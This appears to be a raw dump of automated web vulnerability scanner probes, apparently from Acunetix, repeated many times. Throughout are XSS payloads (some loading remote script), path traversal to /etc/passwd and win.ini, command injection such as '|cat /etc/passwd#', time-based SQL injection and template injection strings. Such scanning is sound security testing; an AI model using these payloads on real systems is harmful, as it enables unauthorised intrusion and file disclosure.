1_OnRUL <ScRiPt >prompt(993870)</ScRiPt>

1

http://hit5lDA45A7Vz.bxss.me/

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

comments

1

1

2dsgdGhG'

1

................etc/passwd

1

1

comments

'&dir&'

http://www.acunetix.tst

EpHyJIuI')

1

1

1

'"

comments/.

"&dir&"

USpeEbeD'))

1

1

1

1

1

<!--

file:///etc/passwd

|dir

1

1

1

1'"()&%<ScRiPt >prompt(983999)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(923219)</ScRiPt>

1

'|dir

1

1_973227

1

WEB-INF/web.xml

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

acu5762<s1﹥s2ʺs3ʹuca5762

1

../../../../../../../../../../boot.ini

acux5478z1z2abcxuca5478

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(991682)</ScRiPt>

1

1

1

1<script>prompt(967055)</script>

windowswin.ini

1

1

1

1<ScRiPt >prompt(932918)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906926></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(962888)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<video><source onerror="javascript:prompt(988099)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9557356*9369949)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(957859)"></g></svg>

&cat /etc/passwd&

1

1

1

'+response.write(9557356*9369949)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'&cat /etc/passwd&'

1<div style=width:expression(prompt(971040))>

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9557356*9369949)+"

1

1

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

WEB-INF/web.xml

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

cat /etc/passwd

1

1<body onload=prompt(940093)>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

${100041+99667}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986444)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<img src=xyz OnErRor=prompt(908045)>

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n995497=v927638

-1

1

1

1<img/src=">" onerror=alert(979916)>

)

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

1

-1)

1

1<ScRiPt%20>prompt(904789)</sCripT>

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1&lt

1

"|"ld

-1))

1

^(#$!@#$)(()))******

testasp.vulnweb.com

.\./.\./.\./.\./.\./.\./etc/passwd

1

'

<img acu onmouseover=prompt(956534) //>

1

Ewf9HQA9'

1

1

1

/etc/passwd

1

1<input autofocus onfocus=prompt(968116)>

"

'

HWAtT2L1')

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

<a href='http://www.acunetix.com'>website security</a>

1

n99TZP5z'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

"

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

-1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitgXnBLnYF68.bxss.me/

1_uEQiF <ScRiPt >prompt(942782)</ScRiPt>

1

1

comments

1

-1)

1

................etc/passwd

1

&dir

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

-1))

1

http://www.acunetix.tst

1

comments/.

1

'&dir&'

1

AN5n7kQr'

1

1

1'"()&%<ScRiPt >prompt(926158)</ScRiPt>

'"

file:///etc/passwd

"&dir&"

1

vnbUIFTJ')

1

1

/\../\../\../\../\../\../\../etc/passwd

<!--

'"()&%<ScRiPt >prompt(976870)</ScRiPt>

1

|dir

1

1

X0F8OUip'))

WEB-INF/web.xml

1

1

'|dir

1_955879

1

1

1

1

1

WEB-INF\web.xml

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu4788<s1﹥s2ʺs3ʹuca4788

windowswin.ini

1

1

1

acux5943z1z2abcxuca5943

1

................windowswin.ini

1

1

1<ScRiPt >prompt(960065)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(907493)</script>

1

1

1

1<ScRiPt >prompt(978342)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

response.write(9502035*9359645)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958423></ScRiPt>

1

1

1

'+response.write(9502035*9359645)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(983218)</ScRiPt>

&cat /etc/passwd&

1

1

"+response.write(9502035*9359645)+"

'&cat /etc/passwd&'

1<video><source onerror="javascript:prompt(973902)">

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945729)"></g></svg>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1

1

cat /etc/passwd

1<div style=width:expression(prompt(958117))>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF\web.xml

`cat /etc/passwd`

1<iframe src='data:text/html

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

|cat /etc/passwd#

1<body onload=prompt(997818)>

1

${99931+100469}

1

1

1

-1

1

'|'ld

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973750)>

1

1

1&n904998=v976200

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

"|"ld

1<img src=xyz OnErRor=prompt(930089)>

)

1

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

'"()

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(916225)>

!(()&&!|*|*|

1

s3oZMSTu'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt%20>prompt(939219)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

^(#$!@#$)(()))******

'

1

wCjwOfBf')

1

testasp.vulnweb.com

.\./.\./.\./.\./.\./.\./etc/passwd

1

1&lt

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

DJjtEccL'))

"

1

1

/etc/passwd

1

1

1

<img acu onmouseover=prompt(925953) //>

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

-1

1

1

http://hit4LaK0HAv9j.bxss.me/

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(972878)>

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

-1)

1

1

1

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

-1))

'&dir&'

1

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

[url=http://www.acunetix.com]website security[/url]

................etc/passwd

B1RmiaNO'

http://www.acunetix.tst

"&dir&"

'"

comments/.

1_jIT75 <ScRiPt >prompt(948433)</ScRiPt>

1

1

1

BEtIyGcB')

1

<!--

1

|dir

1

1'"()&%<ScRiPt >prompt(924874)</ScRiPt>

1

RNDLXKiA'))

1

1

1

'|dir

file:///etc/passwd

1

1

1

1

'"()&%<ScRiPt >prompt(993326)</ScRiPt>

1

1

"|dir

1

1

1_988144

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

acu2559<s1﹥s2ʺs3ʹuca2559

1

1

../../../../../../../../../../boot.ini

1

1

acux4384z1z2abcxuca4384

1

../../../../../../../../../../windows/win.ini.jpg

1

windowswin.ini

1<ScRiPt >prompt(981960)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(951419)</script>

1

1

1

1<ScRiPt >prompt(989405)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929762></ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(941579)</ScRiPt>

1

response.write(9776068*9405447)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'+response.write(9776068*9405447)+'

1<video><source onerror="javascript:prompt(918441)">

1

1

&cat /etc/passwd&

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(911144)"></g></svg>

"+response.write(9776068*9405447)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(983091))>

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<body onload=prompt(928047)>

1

if(now()=sysdate(),sleep(9.048),0)/*'XOR(if(now()=sysdate(),sleep(9.048),0))OR'"XOR(if(now()=sysdate(),sleep(9.048),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(905835)>

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9.048)))v)/*'+(select(0)from(select(sleep(9.048)))v)+'"+(select(0)from(select(sleep(9.048)))v)+"*/

1<img src=xyz OnErRor=prompt(989930)>

1

`cat /etc/passwd`

1

1

1

${99773+99288}

1

1<img/src=">" onerror=alert(957626)>

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

|cat /etc/passwd#

1

1<ScRiPt%20>prompt(968190)</sCripT>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n989492=v984521

1

1&lt

)

-1))

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

<img acu onmouseover=prompt(918191) //>

24fIvTws'

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

'"()

1

testasp.vulnweb.com

.\./.\./.\./.\./.\./.\./etc/passwd

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(977220)>

JTLcdpLD')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

CCfii8dR'))

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

1

1

1

1

'

"

1

-1

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

"

1_0G3wL <ScRiPt >prompt(965336)</ScRiPt>

http://hit8LzraDNrAW.bxss.me/

1

acunetix_wvs_invalid_filename

1

-1))

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

TL92F3u9'

1

1

comments

1

1

................etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

nEdusOrq')

1

comments

1

http://www.acunetix.tst

1

1

'&dir&'

zoHSmr18'))

'"

1

1'"()&%<ScRiPt >prompt(937039)</ScRiPt>

comments/.

file:///etc/passwd

1

1

<!--

'"()&%<ScRiPt >prompt(927770)</ScRiPt>

1

1

1

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1_913442

1

1

1

|dir

1

1

1

WEB-INF/web.xml

1

'|dir

1

1

"|dir

WEB-INF\web.xml

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

acu2229<s1﹥s2ʺs3ʹuca2229

1

../../../../../../../../../../windows/win.ini.jpg

1

acux7444z1z2abcxuca7444

1

1

windowswin.ini

1<ScRiPt >prompt(980517)</ScRiPt>

1

1

1

1<script>prompt(911200)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(910635)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?919819></ScRiPt>

1

1

1

1<ScRiPt >prompt(959365)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(968668)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(932752)"></g></svg>

1

1

1

response.write(9542454*9083949)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(946339))>

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9542454*9083949)+'

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9542454*9083949)+"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(967571)>

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988158)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1<img src=xyz OnErRor=prompt(980104)>

-1

1

1

1

${100398+99411}

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(992995)>

-1)

1

1&n973361=v971304

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1))

1<ScRiPt%20>prompt(950576)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1

)

1some_inexistent_file_with_long_name%00.jpg

xUSKoqFt'

1&lt

1

1

NFAzYF1A')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

"|"ld

1

^(#$!@#$)(()))******

<img acu onmouseover=prompt(914204) //>

4ET9AMAU'))

testasp.vulnweb.com

1

1

/etc/passwd

1

'

1

1<input autofocus onfocus=prompt(955469)>

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

1

"

1

'

<a href='http://www.acunetix.com'>website security</a>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

1

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

................etc/passwd

acunetix_wvs_invalid_filename

0rikoT2e'

http://hitDqubTR9xv1.bxss.me/

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_EdgTs <ScRiPt >prompt(943871)</ScRiPt>

comments

cfAEtcpV')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

1

1

1

1

comments

1

YmwnQjwr'))

'&dir&'

file:///etc/passwd

'"

http://www.acunetix.tst

1

1

comments/.

1'"()&%<ScRiPt >prompt(920034)</ScRiPt>

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

'"()&%<ScRiPt >prompt(919717)</ScRiPt>

1

1

|dir

1

WEB-INF/web.xml

1

1

1

1_940439

1

1

WEB-INF\web.xml

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu3715<s1﹥s2ʺs3ʹuca3715

1

1

1

acux1374z1z2abcxuca1374

windowswin.ini

1

1<ScRiPt >prompt(975717)</ScRiPt>

1

1

1<script>prompt(905086)</script>

1

................windowswin.ini

1<ScRiPt >prompt(959519)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912355></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(975919)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(969426)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

response.write(9955595*9445062)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936929)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

'+response.write(9955595*9445062)+'

1<div style=width:expression(prompt(928524))>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9955595*9445062)+"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

WEB-INF/web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1<body onload=prompt(914934)>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970708)>

1

1

1

`cat /etc/passwd`

-1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(988685)>

1

1

1

|cat /etc/passwd#

1

-1)

1

${99844+100199}

1

1<img/src=">" onerror=alert(905968)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

1

1

-1))

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

1<ScRiPt%20>prompt(994855)</sCripT>

1

"|"ld

1&n981898=v903654

1

wzologIU'

1

)

1some_inexistent_file_with_long_name%00.jpg

/etc/passwd

1&lt

1

1

zkIcgxS9')

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

'

<img acu onmouseover=prompt(943753) //>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

277YMNP2'))

1

^(#$!@#$)(()))******

testasp.vulnweb.com

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1<input autofocus onfocus=prompt(948337)>

'

-1

1

1

1

1

1

................etc/passwd

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

-1)

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

-1))

[url=http://www.acunetix.com]website security[/url]

&dir

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

1

1

1_TYjBw <ScRiPt >prompt(951547)</ScRiPt>

EMUEpnvT'

'&dir&'

1

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

Z0jFkpaE')

1

comments

http://hitPpA2V0w9Wx.bxss.me/

1

1

/\../\../\../\../\../\../\../etc/passwd

1

T1gjoWPQ'))

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1

1

1

|dir

WEB-INF/web.xml

1

1

1

comments/.

http://www.acunetix.tst

'"

1

WEB-INF\web.xml

'|dir

1

1

1

1'"()&%<ScRiPt >prompt(940650)</ScRiPt>

<!--

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(907270)</ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1

1

1_988766

1

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

1

windowswin.ini

acu3591<s1﹥s2ʺs3ʹuca3591

1

1

acux4886z1z2abcxuca4886

1

................windowswin.ini

1

1<ScRiPt >prompt(983947)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(909456)</script>

1

1

1

1<ScRiPt >prompt(943786)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945834></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(971871)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(977384)">

response.write(9914377*9163203)

1

1

1

'+response.write(9914377*9163203)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(915161)"></g></svg>

WEB-INF/web.xml

1

1

&cat /etc/passwd&

"+response.write(9914377*9163203)+"

1

WEB-INF\web.xml

1<div style=width:expression(prompt(991265))>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

1

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(968524)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(930501)>

${100227+100062}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(930168)>

1

1

1

`cat /etc/passwd`

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1

1<img/src=">" onerror=alert(952502)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n958975=v991754

1

-1))

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1<ScRiPt%20>prompt(910538)</sCripT>

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

nRccptXZ'

1

'|'ld

testasp.vulnweb.com

'"()

!(()&&!|*|*|

1

qwvdmlpl')

1&lt

/etc/passwd

1

1

1

"|"ld

^(#$!@#$)(()))******

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<img acu onmouseover=prompt(908507) //>

1

sfzL8WjM'))

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<input autofocus onfocus=prompt(968395)>

${@print(md5(acunetix_wvs_security_test))}

-1

1

1

1

1

'

1

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

................etc/passwd

-1)

acunetix_wvs_invalid_filename

1

http://hitdedu2s8P8T.bxss.me/

1

"

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

-1))

||cat /etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_c5FqI <ScRiPt >prompt(921515)</ScRiPt>

1

1

comments

ruJnZDAE'

file:///etc/passwd

&dir

1

http://www.acunetix.tst

1

1

comments/.

'"

y7rMchlg')

1

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1

1'"()&%<ScRiPt >prompt(993349)</ScRiPt>

1

<!--

IPCKFIF7'))

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(974586)</ScRiPt>

1

"&dir&"

1

1

1

1

1

1

|dir

1_979691

WEB-INF\web.xml

1

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

"|dir

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu7843<s1﹥s2ʺs3ʹuca7843

1

acux5940z1z2abcxuca5940

1

1

windowswin.ini

1

1

................windowswin.ini

1

1<ScRiPt >prompt(957783)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(952617)</script>

1

1

1<ScRiPt >prompt(940046)</ScRiPt>

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906624></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(946640)</ScRiPt>

1

response.write(9313118*9003266)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(976476)">

1

'+response.write(9313118*9003266)+'

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919442)"></g></svg>

1

"+response.write(9313118*9003266)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<div style=width:expression(prompt(998317))>

1

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

"&cat /etc/passwd&"

1<iframe src='data:text/html

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1<body onload=prompt(914317)>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(955553)>

1

${99619+100284}

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(968063)>

1

1&n986038=v907833

1

-1)

)

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1<img/src=">" onerror=alert(939839)>

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

